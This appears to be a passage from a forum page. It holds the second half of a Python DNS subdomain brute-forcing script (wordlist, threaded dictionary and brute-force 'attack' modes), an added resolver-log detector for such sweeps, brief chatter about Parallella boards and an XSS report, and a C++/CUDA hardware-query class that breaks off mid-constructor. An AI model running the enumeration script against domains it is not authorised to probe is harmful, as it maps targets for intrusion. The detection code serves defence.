'developers', 'development', 'device', 'devserver', 'devsql', 'dhcp', 'dial', 'dialup', 'digital', 'dilbert', 'dir', 'direct', 'directory', 'disc', 'discovery', 'discuss', 'discussion', 'discussions', 'disk', 'disney', 'distributer', 'distributers', 'dj', 'dk', 'dm', 'dmail', 'dmz', 'dnews', 'dns', 'dns-2', 'dns0', 'dns1', 'dns2', 'dns3', 'do', 'doc', 'docs', 'document', 'documentacion', 'documentos', 'domain', 'domains', 'dominio', 'domino', 'dominoweb', 'doom', 'download', 'downloads', 'downtown', 'dragon', 'drupal', 'dsl', 'dyn', 'dynamic', 'dynip', 'dz', 'e', 'e-com', 'e-commerce', 'e0', 'eaccess', 'eagle', 'earth', 'east', 'ec', 'echo', 'ecom', 'ecommerce', 'edi', 'edu', 'education', 'edward', 'ee', 'eg', 'eh', 'ejemplo', 'elpaso', 'email', 'employees', 'empresa', 'empresas', 'en', 'enable', 'eng', 'eng01', 'eng1', 'engine', 'engineer', 'engineering', 'enterprise', 'epsilon', 'er', 'erp', 'es', 'esd', 'esm', 'espanol', 'estadisticas', 'esx', 'et', 'eta', 'europe', 'events', 'example', 'examples', 'exchange', 'exec', 'exit', 'ext', 'extern', 'external', 'extranet', 'f', 'f5', 'falcon', 'farm', 'faststats', 'fax', 'feedback', 'feeds', 'fi', 'field', 'file', 'files', 'fileserv', 'fileserver', 'filestore', 'filter', 'finance', 'find', 'finger', 'firewall', 'fix', 'fixes', 'fj', 'fk', 'fl', 'flash', 'florida', 'flow', 'fm', 'fo', 'foobar', 'formacion', 'foro', 'foros', 'fortworth', 'forum', 'forums', 'foto', 'fotos', 'foundry', 'fox', 'foxtrot', 'fr', 'france', 'frank', 'fred', 'freebsd', 'freebsd0', 'freebsd01', 'freebsd02', 'freebsd1', 'freebsd2', 'freeware', 'fresno', 'front', 'frontdesk', 'fs', 'fsp', 'ftp', 'ftp-', 'ftp0', 'ftp2', 'ftpserver', 'fw', 'fw-1', 'fw1', 'fwsm', 'fwsm0', 'fwsm01', 'fwsm1', 'g', 'ga', 'galeria', 'galerias', 'galleries', 'gallery', 'games', 'gamma', 'gandalf', 'gate', 'gatekeeper', 'gateway', 'gauss', 'gd', 'ge', 'gemini', 'general', 'george', 'georgia', 'germany', 'gf', 'gg', 'gh', 'gi', 'git', 'gl', 'glendale', 'gm', 'gmail', 'gn', 
'go', 'gold', 'goldmine', 'golf', 'gopher', 'gp', 'gq', 'gr', 'green', 'group', 'groups', 'groupwise', 'gs', 'gsx', 'gt', 'gu', 'guest', 'gw', 'gw1', 'gy', 'h', 'hal', 'halflife', 'hawaii', 'hello', 'help', 'helpdesk', 'helponline', 'henry', 'hermes', 'hi', 'hidden', 'hk', 'hm', 'hn', 'hobbes', 'hollywood', 'home', 'homebase', 'homer', 'honeypot', 'honolulu', 'host', 'host1', 'host3', 'host4', 'host5', 'hotel', 'hotjobs', 'houstin', 'houston', 'howto', 'hp', 'hpc', 'hpov', 'hr', 'ht', 'http', 'https', 'hu', 'hub', 'humanresources', 'i', 'ia', 'ias', 'ibm', 'ibmdb', 'id', 'ida', 'idaho', 'ids', 'ie', 'iis', 'il', 'illinois', 'im', 'image', 'images', 'imail', 'imap', 'imap4', 'img', 'img0', 'img01', 'img02', 'imgs', 'in', 'inbound', 'inc', 'include', 'incoming', 'india', 'indiana', 'indianapolis', 'info', 'informix', 'inside', 'install', 'int', 'interface', 'intern', 'internal', 'international', 'internet', 'intl', 'intranet', 'invalid', 'investor', 'investors', 'io', 'iota', 'iowa', 'ip6', 'iplanet', 'ipmonitor', 'ipsec', 'ipsec-gw', 'ipv6', 'iq', 'ir', 'irc', 'ircd', 'ircserver', 'ireland', 'iris', 'irvine', 'irving', 'is', 'isa', 'isaserv', 'isaserver', 'ism', 'israel', 'isync', 'it', 'italy', 'ix', 'j', 'jabber', 'japan', 'java', 'jboss', 'je', 'jedi', 'jm', 'jo', 'jobs', 'john', 'jp', 'jrun', 'juegos', 'juliet', 'juliette', 'juniper', 'jupiter', 'k', 'kansas', 'kansascity', 'kappa', 'kb', 'ke', 'kentucky', 'kerberos', 'keynote', 'kg', 'kh', 'ki', 'kilo', 'king', 'km', 'kn', 'knowledgebase', 'knoxville', 'koe', 'korea', 'kp', 'kr', 'ks', 'kw', 'ky', 'kz', 'l', 'la', 'lab', 'laboratory', 'labs', 'lambda', 'lan', 'laptop', 'laserjet', 'lasvegas', 'launch', 'lb', 'lc', 'ldap', 'legal', 'leo', 'li', 'lib', 'library', 'lima', 'lincoln', 'link', 'linux', 'linux0', 'linux01', 'linux02', 'linux1', 'linux2', 'lista', 'lists', 'listserv', 'listserver', 'live', 'lk', 'load', 'loadbalancer', 'local', 'localhost', 'log', 'log0', 'log01', 'log02', 'log1', 'log2', 'logfile', 
'logfiles', 'logger', 'logging', 'loghost', 'login', 'logs', 'london', 'longbeach', 'losangeles', 'lotus', 'louisiana', 'lr', 'ls', 'lt', 'lu', 'luke', 'lv', 'ly', 'lyris', 'm', 'ma', 'mac', 'mac1', 'mac10', 'mac11', 'mac2', 'mac3', 'mac4', 'mac5', 'mach', 'macintosh', 'madrid', 'mail', 'mail2', 'mailer', 'mailgate', 'mailhost', 'mailing', 'maillist', 'maillists', 'mailroom', 'mailserv', 'mailsite', 'mailsrv', 'main', 'maine', 'maint', 'mall', 'manage', 'management', 'manager', 'managers', 'manufacturing', 'map', 'mapas', 'maps', 'marketing', 'marketplace', 'mars', 'marvin', 'mary', 'maryland', 'massachusetts', 'master', 'max', 'mc', 'mci', 'md', 'mdaemon', 'me', 'media', 'member', 'members', 'memphis', 'mercury', 'merlin', 'messages', 'messenger', 'mg', 'mgmt', 'mh', 'mi', 'miami', 'michigan', 'mickey', 'midwest', 'mike', 'milwaukee', 'minneapolis', 'minnesota', 'mirror', 'mis', 'mississippi', 'missouri', 'mk', 'ml', 'mm', 'mn', 'mngt', 'mo', 'mobile', 'mom', 'monitor', 'monitoring', 'montana', 'moon', 'moscow', 'movies', 'mozart', 'mp', 'mp3', 'mpeg', 'mpg', 'mq', 'mr', 'mrtg', 'ms', 'ms-exchange', 'ms-sql', 'msexchange', 'mssql', 'mssql0', 'mssql01', 'mssql1', 'mt', 'mta', 'mtu', 'mu', 'multimedia', 'music', 'mv', 'mw', 'mx', 'mx01', 'my', 'mysql', 'mysql0', 'mysql01', 'mysql1', 'mz', 'n', 'na', 'name', 'names', 'nameserv', 'nameserver', 'nas', 'nashville', 'nat', 'nc', 'nd', 'nds', 'ne', 'nebraska', 'neptune', 'net', 'netapp', 'netdata', 'netgear', 'netmail', 'netmeeting', 'netscaler', 'netscreen', 'netstats', 'network', 'nevada', 'new', 'newhampshire', 'newjersey', 'newmexico', 'neworleans', 'news', 'newsfeed', 'newsfeeds', 'newsgroups', 'newton', 'newyork', 'newzealand', 'nf', 'ng', 'nh', 'ni', 'nigeria', 'nj', 'nl', 'nm', 'nms', 'nntp', 'no', 'noc', 'node', 'nokia', 'nombres', 'nora', 'north', 'northcarolina', 'northdakota', 'northeast', 'northwest', 'noticias', 'novell', 'november', 'np', 'nr', 'ns', 'ns-', 'ns0', 'ns01', 'ns02', 'ns1', 'ns2', 'ns3', 'ns4', 
'ns5', 'nt', 'nt4', 'nt40', 'ntmail', 'ntp', 'ntserver', 'nu', 'null', 'nv', 'ny', 'nz', 'o', 'oakland', 'ocean', 'odin', 'office', 'offices', 'oh', 'ohio', 'ok', 'oklahoma', 'oklahomacity', 'old', 'om', 'omaha', 'omega', 'omicron', 'online', 'ontario', 'op', 'open', 'openbsd', 'openview', 'operations', 'ops', 'ops0', 'ops01', 'ops02', 'ops1', 'ops2', 'opsware', 'or', 'oracle', 'orange', 'order', 'orders', 'oregon', 'orion', 'orlando', 'oscar', 'out', 'outbound', 'outgoing', 'outlook', 'outside', 'ov', 'owa', 'owa01', 'owa02', 'owa1', 'owa2', 'ows', 'oxnard', 'p', 'pa', 'page', 'pager', 'pages', 'paginas', 'papa', 'paris', 'parners', 'partner', 'partners', 'patch', 'patches', 'paul', 'payroll', 'pbx', 'pc', 'pc01', 'pc1', 'pc10', 'pc101', 'pc11', 'pc12', 'pc13', 'pc14', 'pc15', 'pc16', 'pc17', 'pc18', 'pc19', 'pc2', 'pc20', 'pcmail', 'pda', 'pdc', 'pe', 'pegasus', 'pennsylvania', 'peoplesoft', 'personal', 'pf', 'pg', 'pgp', 'ph', 'phi', 'philadelphia', 'phoenix', 'phoeniz', 'phone', 'phones', 'photos', 'phpmyadmin', 'pi', 'pics', 'pictures', 'pink', 'pipex-gw', 'pittsburgh', 'pix', 'pk', 'pki', 'pl', 'plano', 'platinum', 'plesk', 'pluto', 'pm', 'pm1', 'pma', 'pn', 'po', 'policy', 'polls', 'pop', 'pop3', 'portal', 'portals', 'portfolio', 'portland', 'post', 'postales', 'postoffice', 'ppp1', 'ppp10', 'ppp11', 'ppp12', 'ppp13', 'ppp14', 'ppp15', 'ppp16', 'ppp17', 'ppp18', 'ppp19', 'ppp2', 'ppp20', 'ppp21', 'ppp3', 'ppp4', 'ppp5', 'ppp6', 'ppp7', 'ppp8', 'ppp9', 'pptp', 'pr', 'pre', 'prensa', 'press', 'printer', 'printserv', 'printserver', 'priv', 'privacy', 'private', 'problemtracker', 'products', 'profiles', 'project', 'projects', 'promo', 'proxy', 'prueba', 'pruebas', 'ps', 'psi', 'pss', 'pt', 'pub', 'public', 'pubs', 'purple', 'pw', 'py', 'q', 'qa', 'qmail', 'qotd', 'quake', 'quebec', 'queen', 'quotes', 'r', 'r01', 'r02', 'r1', 'r2', 'ra', 'rack', 'radio', 'radius', 'rapidsite', 'raptor', 'ras', 'rc', 'rcs', 'rd', 're', 'read', 'realserver', 'recruiting', 'red', 
'redhat', 'ref', 'reference', 'reg', 'register', 'registro', 'registry', 'regs', 'relay', 'release', 'rem', 'remote', 'remstats', 'report', 'reports', 'research', 'reseller', 'reserved', 'resumenes', 'rho', 'rhodeisland', 'ri', 'ris', 'rmi', 'ro', 'robert', 'romeo', 'root', 'rose', 'route', 'router', 'router1', 'rs', 'rss', 'rtelnet', 'rtr', 'rtr01', 'rtr1', 'ru', 'rune', 'rw', 'rwhois', 's', 's1', 's2', 'sa', 'sac', 'sacramento', 'sadmin', 'safe', 'sales', 'saltlake', 'sam', 'san', 'sanantonio', 'sandiego', 'sanfrancisco', 'sanjose', 'saskatchewan', 'saturn', 'sb', 'sbs', 'sc', 'scanner', 'schedules', 'scotland', 'scotty', 'sd', 'se', 'search', 'seattle', 'sec', 'secret', 'secure', 'secured', 'securid', 'security', 'sendmail', 'seri', 'serv', 'serv2', 'server', 'server1', 'servers', 'service', 'services', 'servicio', 'servidor', 'setup', 'sg', 'sh', 'share', 'shared', 'sharepoint', 'shares', 'shareware', 'shipping', 'shop', 'shoppers', 'shopping', 'si', 'siebel', 'sierra', 'sigma', 'signin', 'signup', 'silver', 'sim', 'sirius', 'site', 'sj', 'sk', 'skywalker', 'sl', 'slackware', 'slmail', 'sm', 'smc', 'sms', 'smtp', 'smtphost', 'sn', 'sniffer', 'snmp', 'snmpd', 'snoopy', 'snort', 'so', 'socal', 'software', 'sol', 'solaris', 'solutions', 'soporte', 'source', 'sourcecode', 'sourcesafe', 'south', 'southcarolina', 'southdakota', 'southeast', 'southwest', 'spain', 'spam', 'spider', 'spiderman', 'splunk', 'spock', 'spokane', 'springfield', 'sprint', 'sqa', 'sql', 'sql0', 'sql01', 'sql1', 'sql7', 'sqlserver', 'squid', 'squirrel', 'squirrelmail', 'sr', 'srv', 'ss', 'ssh', 'ssl', 'ssl0', 'ssl01', 'ssl1', 'st', 'staff', 'stage', 'stage1', 'staging', 'start', 'stat', 'static', 'statistics', 'stats', 'stlouis', 'stock', 'storage', 'store', 'storefront', 'streaming', 'stronghold', 'strongmail', 'studio', 'submit', 'subversion', 'sun', 'sun0', 'sun01', 'sun02', 'sun1', 'sun2', 'superman', 'supplier', 'suppliers', 'support', 'sv', 'svn', 'sw', 'sw0', 'sw01', 'sw1', 'sweden', 
'switch', 'switzerland', 'sy', 'sybase', 'sydney', 'sysadmin', 'sysback', 'syslog', 'syslogs', 'system', 'sz', 't', 'tacoma', 'taiwan', 'talk', 'tampa', 'tango', 'tau', 'tc', 'tcl', 'td', 'team', 'tech', 'technology', 'techsupport', 'telephone', 'telephony', 'telnet', 'temp', 'tennessee', 'terminal', 'terminalserver', 'termserv', 'test', 'test2k', 'testbed', 'testing', 'testlab', 'testlinux', 'tests', 'testserver', 'testsite', 'testsql', 'testxp', 'texas', 'tf', 'tftp', 'tg', 'th', 'thailand', 'theta', 'thor', 'tienda', 'tiger', 'time', 'titan', 'tivoli', 'tj', 'tk', 'tm', 'tn', 'to', 'tokyo', 'toledo', 'tom', 'tool', 'tools', 'toplayer', 'toronto', 'tour', 'tp', 'tr', 'tracker', 'train', 'training', 'transfers', 'trinidad', 'trinity', 'ts', 'ts1', 'tt', 'tucson', 'tulsa', 'tunnel', 'tv', 'tw', 'tx', 'tz', 'u', 'ua', 'uddi', 'ug', 'uk', 'um', 'uniform', 'union', 'unitedkingdom', 'unitedstates', 'unix', 'unixware', 'update', 'updates', 'upload', 'uploads', 'ups', 'upsilon', 'uranus', 'urchin', 'us', 'usa', 'usenet', 'user', 'users', 'ut', 'utah', 'utilities', 'uy', 'uz', 'v', 'va', 'vader', 'vantive', 'vault', 'vc', 've', 'vega', 'vegas', 'vend', 'vendors', 'venus', 'vermont', 'vg', 'vi', 'victor', 'video', 'videos', 'viking', 'violet', 'vip', 'virginia', 'virtual', 'vista', 'vm', 'vmserver', 'vmware', 'vn', 'vnc', 'voice', 'voicemail', 'voip', 'voyager', 'vpn', 'vpn0', 'vpn01', 'vpn02', 'vpn1', 'vpn2', 'vt', 'vu', 'vz', 'w', 'w1', 'w2', 'w3', 'wa', 'wais', 'wallet', 'wam', 'wan', 'wap', 'warehouse', 'washington', 'wc3', 'web', 'webaccess', 'webadmin', 'webalizer', 'webboard', 'webcache', 'webcam', 'webcast', 'webdev', 'webdocs', 'webfarm', 'webhelp', 'weblib', 'weblogic', 'webmail', 'webmaster', 'webmin', 'webproxy', 'webring', 'webs', 'webserv', 'webserver', 'webservices', 'webshop', 'website', 'websites', 'websphere', 'websrv', 'websrvr', 'webstats', 'webstore', 'websvr', 'webtrends', 'welcome', 'west', 'westvirginia', 'wf', 'whiskey', 'white', 'whois', 'wi', 
```python
    'wichita', 'wiki', 'wililiam', 'win', 'win01', 'win02', 'win1', 'win2', 'win2000', 'win2003', 'win2k', 'win2k3', 'windows', 'windows01', 'windows02', 'windows1', 'windows2', 'windows2000', 'windows2003', 'windowsxp', 'wingate', 'winnt', 'winproxy', 'wins', 'winserve', 'winxp', 'wire', 'wireless', 'wisconsin', 'wlan', 'wordpress', 'work', 'workstation', 'world', 'wpad', 'write', 'ws', 'ws1', 'ws10', 'ws11', 'ws12', 'ws13', 'ws2', 'ws3', 'ws4', 'ws5', 'ws6', 'ws7', 'ws8', 'ws9', 'wusage', 'wv', 'ww', 'www', 'www-', 'www-01', 'www-02', 'www-1', 'www-2', 'www-int', 'www0', 'www01', 'www02', 'www1', 'www2', 'www3', 'wwwchat', 'wwwdev', 'wwwmail', 'wy', 'wyoming', 'x', 'x-ray', 'xi', 'xlogan', 'xmail', 'xml', 'xp', 'y', 'yankee', 'ye', 'yellow', 'young', 'yt', 'yu', 'z', 'z-log', 'za', 'zebra', 'zera', 'zeus', 'zlog', 'zm', 'zulu', 'zw'
]

# NOTE: the imports (sys, socket, argparse, threading, itertools, time, re,
# dns.message, dns.query, dns.exception) and the globals USAGE, BANNER,
# VERSION, defaults, found, diffound, chars, digits, prefix, postfix and
# wordlist are defined in the script header above the wordlist.


def usage():
    print('\n' + USAGE)
    sys.exit()


def check_usage():
    if len(sys.argv) == 1:
        print('[!] WARNING: use -H for help and usage')
        sys.exit()


def get_default_nameserver():
    print('[+] getting default nameserver')
    lines = list(open('/etc/resolv.conf', 'r'))
    for line in lines:
        # str methods instead of the Python 2 only string.strip()/string.split()
        line = line.strip()
        if not line or line[0] == ';' or line[0] == '#':
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        if fields[0] == 'nameserver':
            defaults['nameserver'] = fields[1]
    return defaults


def get_default_source_ip():
    print('[+] getting default ip address')
    try:
        # find the currently used interface by establishing a temporary socket
        ipsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        ipsocket.connect(("gmail.com", 80))
        defaults['ipaddr'] = ipsocket.getsockname()[0]
        print('[+] found currently used interface ip ' + "'" +
              defaults['ipaddr'] + "'")
        ipsocket.close()
    except socket.error:
        print('''
[!] WARNING: can\'t get your ip-address, use "-i" option and define yourself''')
    return defaults


def parse_cmdline():
    p = argparse.ArgumentParser(usage=USAGE, add_help=False)
    p.add_argument('-t', metavar='<type>', dest='type',
                   help='attack type (0 for dictionary 1 for bruteforce)')
    p.add_argument('-a', metavar='<domain>', dest='domain',
                   help='subdomain to bruteforce')
    p.add_argument('-l', metavar='<wordlist>', dest='wordlist',
                   help='wordlist, one hostname per line (default: predefined in code)')
    p.add_argument('-d', metavar='<nameserver>', dest='dnshost',
                   help="choose another nameserver (default: your system's)")
    p.add_argument('-i', metavar='<ipaddr>', dest='ipaddr',
                   help="source ip address to use (default: your system's)")
    p.add_argument('-p', metavar='<port>', dest='port', default=0,
                   help='source port to use (default: 0 --> first free random port)')
    p.add_argument('-u', metavar='<protocol>', dest='protocol', default='udp',
                   help='speak via udp or tcp (default: udp)')
    p.add_argument('-c', metavar='<charset>', dest='charset', default=0,
                   help='choose charset 0 [a-z0-9], 1 [a-z] or 2 [0-9] (default: 0)')
    p.add_argument('-m', metavar='<maxchar>', dest='max', default=2,
                   help='max chars to bruteforce (default: 2)')
    p.add_argument('-s', metavar='<prefix>', dest='prefix',
                   help="prefix for bruteforce, e.g. 'www'")
    p.add_argument('-g', metavar='<postfix>', dest='postfix',
                   help="postfix for bruteforce, e.g. 'www'")
    p.add_argument('-o', metavar='<sec>', dest='timeout', default=3,
                   help='timeout (default: 3)')
    p.add_argument('-v', action='store_true', dest='verbose',
                   help='verbose mode - prints every attempt (default: quiet)')
    p.add_argument('-w', metavar='<sec>', dest='wait', default=0,
                   help='seconds to wait for next request (default: 0)')
    p.add_argument('-x', metavar='<num>', dest='threads', default=32,
                   help='number of threads to use (default: 32) - choose more ')
    p.add_argument('-r', metavar='<logfile>', dest='logfile', default='stdout',
                   help='write found subdomains to file (default: stdout)')
    p.add_argument('-V', action='version', version='%(prog)s ' + VERSION,
                   help='print version information')
    p.add_argument('-H', action='help', help='print this help')
    return p.parse_args()


def check_cmdline(opts):
    if not opts.type or not opts.domain:
        print('[-] ERROR: mount /dev/brain')
        sys.exit()


def set_opts(defaults, opts):
    if not opts.dnshost:
        opts.dnshost = defaults['nameserver']
    if not opts.ipaddr:
        opts.ipaddr = defaults['ipaddr']
    if int(opts.charset) == 0:
        opts.charset = chars + digits
    elif int(opts.charset) == 1:
        opts.charset = chars
    else:
        opts.charset = digits
    if not opts.prefix:
        opts.prefix = prefix
    if not opts.postfix:
        opts.postfix = postfix
    return opts


def read_hostnames(opts):
    print('[+] reading hostnames')
    if opts.wordlist:
        return list(open(opts.wordlist, 'r'))
    return wordlist


def attack(opts, hostname, attack_pool):
    if opts.verbose:
        sys.stdout.write(' -> trying %s\n' % hostname)
        sys.stdout.flush()
    try:
        x = dns.message.make_query(hostname, 1)   # 1 == A record
        if opts.protocol == 'udp':
            a = dns.query.udp(x, opts.dnshost, float(opts.timeout), 53, None,
                              opts.ipaddr, int(opts.port), True, False)
        else:
            a = dns.query.tcp(x, opts.dnshost, float(opts.timeout), 53, None,
                              opts.ipaddr, int(opts.port), False)
        attack_pool.release()
    except dns.exception.Timeout:
        print('[-] ERROR: time out!')
        sys.exit()
    except socket.error:
        print('''[-] ERROR: no connection? ip|srcport incorrectly defined?
you can run only one thread if fixed source port specified!''')
        sys.exit()
    if a.answer:
        answ = ''
        # iterate dns rrset answer (can be multiple sets) field to extract
        # detailed info (dns and ip)
        for i in a.answer:
            answ += str(i[0])
            answ += ' '
        answer = (hostname, answ)
        found.append(answer)


def str_gen(opts, hostnames):
    print('[+] generating list of strings')
    # every string of exactly opts.max chars over the chosen charset
    tmp_hostnames = itertools.product(opts.charset, repeat=int(opts.max))
    hostnames = list(tmp_hostnames)
    hostnames = map(''.join, hostnames)
    return hostnames


def run_threads(opts, hostname, attack_pool, threads):
    t = threading.Thread(target=attack, args=(opts, hostname, attack_pool))
    attack_pool.acquire()
    t.start()
    threads.append(t)
    return threads


def prepare_attack(opts, hostnames):
    sys.stdout.write('[+] attacking \'%s\' via ' % opts.domain)
    threads = list()
    attack_pool = threading.BoundedSemaphore(value=int(opts.threads))
    if opts.type == '0':
        sys.stdout.write('dictionary\n')
        for hostname in hostnames:
            hostname = hostname.rstrip() + '.' + opts.domain
            time.sleep(float(opts.wait))
            threads = run_threads(opts, hostname, attack_pool, threads)
        for t in threads:
            t.join()
    elif opts.type == '1':
        sys.stdout.write('bruteforce\n')
        hostnames = str_gen(opts, hostnames)
        for hostname in hostnames:
            hostname = opts.prefix + hostname + opts.postfix + '.' + opts.domain
            time.sleep(float(opts.wait))
            threads = run_threads(opts, hostname, attack_pool, threads)
        for t in threads:
            t.join()
    else:
        print('[-] ERROR: unknown attack type')
        sys.exit()


def ip_extractor(ip):
    # extract ip from string of rrset answer object
    try:
        extracted = re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip)
        return extracted[0]
    except IndexError:
        print('[-] ERROR: can\'t extract ip addresses')
        sys.exit()


def analyze_results(opts, found):
    # get maindomain ip
    try:
        mainhostip = socket.gethostbyname(opts.domain)
        # append domain|ip to diffound if subdomain ip different than
        # starting domain ip
        for domain, ip in found:
            if ip_extractor(ip) != mainhostip:
                diffound.append(domain + ' | ' + ip)
    except dns.exception.Timeout:
        sys.exit()
    except socket.error:
        print('[-] ERROR: wrong domain or no connection?')
        sys.exit()


def log_results(opts, found, diffound):
    if opts.logfile == 'stdout':
        print('---')
        if not found:
            print('no hosts found ')
        else:
            print('ANSWERED DNS REQUESTS')
            print('---')
            for f in found:
                print(f[0] + ' | ' + f[1])
        if not diffound:
            print('---')
            print('NO HOSTS WITH DIFFERENT IP FOUND ')
        else:
            print('---')
            print('ANSWERED DNS REQUEST WITH DIFFERENT IP')
            print('---')
            for domain in diffound:
                print(domain)
    else:
        print('[+] \033[0;94mlogging results to %s\033[0;m' % opts.logfile)
        with open(opts.logfile, 'w') as f:
            if found:
                f.write('---\n')
                f.write('ANSWERED DNS REQUESTS\n')
                f.write('---\n')
                for x in found:
                    f.write('domain: ' + x[0] + ' | ' + x[1] + '\n')
            if not diffound:
                f.write('---\nNO HOSTS WITH DIFFERENT IP FOUND \n')
            else:
                f.write('---\nANSWERED DNS REQUEST WITH DIFFERENT IP\n---\n')
                for domain in diffound:
                    f.write(domain + '\n')
    print('[+] game over')


def main():
    check_usage()
    opts = parse_cmdline()
    check_cmdline(opts)
    if not opts.dnshost:
        defaults = get_default_nameserver()
    if not opts.ipaddr:
        defaults = get_default_source_ip()
    if opts.protocol != 'udp' and opts.protocol != 'tcp':
        print('[-] ERROR: unknown protocol')
        sys.exit(1337)
    opts = set_opts(defaults, opts)
    hostnames = read_hostnames(opts)
    prepare_attack(opts, hostnames)
    analyze_results(opts, found)
    log_results(opts, found, diffound)


if __name__ == '__main__':
    try:
        print(BANNER + '\n')
        main()
    except KeyboardInterrupt:
        print('\n[!] WARNING: aborted by user')
        raise SystemExit

# EOF
```

Source
    1 point
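The script above leaves a recognisable footprint on the resolver it queries: one client producing NXDOMAIN answers for many distinct labels under a single apex in a short burst (dictionary mode) or for fixed-length labels with a common prefix (bruteforce mode). The detection below is an added example, not part of the posted script; the log line format, the client addresses and the `example.test` names are constructed for it, and the two-label apex assumption in `split_name` is a simplification.

```python
"""Flag subdomain sweeps in a resolver query log (added defensive example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window per (client, apex)
THRESHOLD = 5                    # distinct NXDOMAIN labels that raise an alert

# Constructed sample log: "<ISO time> <client ip> <qname> <rcode>".
# 203.0.113.7 behaves like the dictionary mode above; 198.51.100.9 makes
# two ordinary typos several minutes apart and must not be flagged.
SAMPLE_LOG = """\
2015-03-18T10:00:00 203.0.113.7 www.example.test NOERROR
2015-03-18T10:00:00 203.0.113.7 dns.example.test NOERROR
2015-03-18T10:00:01 203.0.113.7 devsql.example.test NXDOMAIN
2015-03-18T10:00:01 198.51.100.9 wwww.example.test NXDOMAIN
2015-03-18T10:00:01 203.0.113.7 dhcp.example.test NXDOMAIN
2015-03-18T10:00:02 203.0.113.7 dialup.example.test NXDOMAIN
2015-03-18T10:00:02 203.0.113.7 dhcp.example.test NXDOMAIN
2015-03-18T10:00:02 203.0.113.7 dilbert.example.test NXDOMAIN
2015-03-18T10:00:03 203.0.113.7 honeypot.example.test NXDOMAIN
2015-03-18T10:00:03 203.0.113.7 aa.example.test NXDOMAIN
2015-03-18T10:00:04 203.0.113.7 ab.example.test NXDOMAIN
2015-03-18T10:05:00 198.51.100.9 mial.example.test NXDOMAIN
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_line(line):
    """Return (time, client, qname, rcode), or None for a malformed line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, qname, rcode = m.groups()
    return datetime.fromisoformat(ts), client, qname.lower().rstrip("."), rcode


def split_name(qname, apex_labels=2):
    """Split 'devsql.example.test' into ('devsql', 'example.test').

    Assumes the apex is the last two labels; public-suffix handling
    (e.g. example.co.uk) is deliberately out of scope for this example.
    """
    labels = qname.split(".")
    if len(labels) <= apex_labels:
        return None, qname
    return ".".join(labels[:-apex_labels]), ".".join(labels[-apex_labels:])


def detect_sweeps(log_text, window=WINDOW, threshold=THRESHOLD):
    """Return one alert per (client, apex) whose distinct NXDOMAIN labels
    inside `window` reach `threshold`; alerts are (client, apex, count, time).
    Repeated queries for the same missing label count once, so a retrying
    client with one typo does not inflate the score."""
    recent = defaultdict(deque)   # (client, apex) -> deque of (time, label)
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, qname, rcode = rec
        if rcode != "NXDOMAIN":
            continue
        label, apex = split_name(qname)
        if label is None:
            continue                      # query for the apex itself
        key = (client, apex)
        q = recent[key]
        q.append((ts, label))
        while q and ts - q[0][0] > window:   # drop entries outside the window
            q.popleft()
        distinct = {lbl for _, lbl in q}
        if len(distinct) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((client, apex, len(distinct), ts))
    return alerts


if __name__ == "__main__":
    for client, apex, n, ts in detect_sweeps(SAMPLE_LOG):
        print("[!] %s %s queried %d non-existent names under %s" % (ts, client, n, apex))
```

With the sample log the scanner is flagged at 10:00:03, the fifth distinct missing label, while the second client never reaches the threshold; tune `WINDOW` and `THRESHOLD` to the zone's normal NXDOMAIN rate before deploying this against real logs.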
  4. I'm sure there are several people interested (me included). About begood: SpaceX, meaning the company that develops and builds rockets and spacecraft? As for this system, there are many things that could be done. An rst-branded project on this platform would be interesting, but no idea comes to mind (apart from hash cracking or related things).
    1 point
  5. I don't think it performs very well for mining. @begood is passionate about this stuff; maybe we can convince him to come back to the forum and tell us whether he has played with Parallella. Do you have any project in mind? I was thinking of reproducing a magic mirror, but I'm not too keen on the Raspberry Pi.
    1 point
  6. I know what POC means. The thing is that people have no clue what an XSS is. You tell them the location, the vulnerable parameter, you even sketch a small attack scenario for them, and they ask why I used document.cookie. I explain it to them and then they ask what data I have access to...
    1 point
  7. A few days ago I saw a question about how to get the number of CPU cores. The snippet below returns the number of cores and the specs of the graphics card (if it belongs to the Nvidia GeForce family):

system_specs.h:

```cpp
#ifndef SYSTEM_SPECS_H
#define SYSTEM_SPECS_H

// project-wide header; it is expected to pull in <cuda_runtime.h>, <iostream>,
// <string>, <cstdio> and <windows.h> (WIN32) or <unistd.h> (linux)
#include "includes.h"

class SystemSpecs {
public:
    SystemSpecs(bool showInfo);
    ~SystemSpecs(void) { delete[] device_prop; }   // frees the array allocated in the constructor

    int getNumberOfCPUCores(void);
    int getProcessorType(void);
    int getNumberOfGPUs(void);
    size_t getTotalConstantMemory(int deviceID);
    size_t getTotalGlobalMemory(int deviceID);
    size_t getSharedMemPerBlock(int deviceID);
    int getWarpSize(int deviceID);
    int getMaxNumberOfBlocks_x(int deviceID);
    int getMaxNumberOfBlocks_y(int deviceID);
    int getMaxNumberOfBlocks_z(int deviceID);
    int getMaxThreadsPerBlock(int deviceID);
    int getMaxThreads_x(int deviceID);
    int getMaxThreads_y(int deviceID);
    int getMaxThreads_z(int deviceID);
    void printGPUSpecs(void);

private:
#ifdef WIN32
    /// query system info on windows
    SYSTEM_INFO system_info;
#else
    /// query system info on linux
#endif
    int device_count;
    int dev;
    int runtime_version, driver_version;
    cudaDeviceProp *device_prop;
    char msg[256];
    char cTemp[10];
    std::string sprofile_string;
};

#endif
```

system_specs.cpp:

```cpp
#include "system_specs.h"

using std::cout;
using std::endl;

SystemSpecs::SystemSpecs(bool showInfo)
    // initialised up front so the getters are safe even when showInfo is false
    : device_count(0), dev(0), runtime_version(0), driver_version(0), device_prop(NULL)
{
#ifdef WIN32
    /// query sysinfo on windows
    GetSystemInfo(&system_info);
#else
    /// query sysinfo on linux
#endif
    if (showInfo) {
        sprofile_string = "deviceQuery, CUDA Driver = CUDART";

        if (cudaGetDeviceCount(&device_count) != cudaSuccess) {
            cout << "cudaGetDeviceCount FAILED CUDA Driver and Runtime version may be mismatched.\n" << endl;
        }
        if (device_count == 0) {
            cout << "There is no device supporting CUDA" << endl;
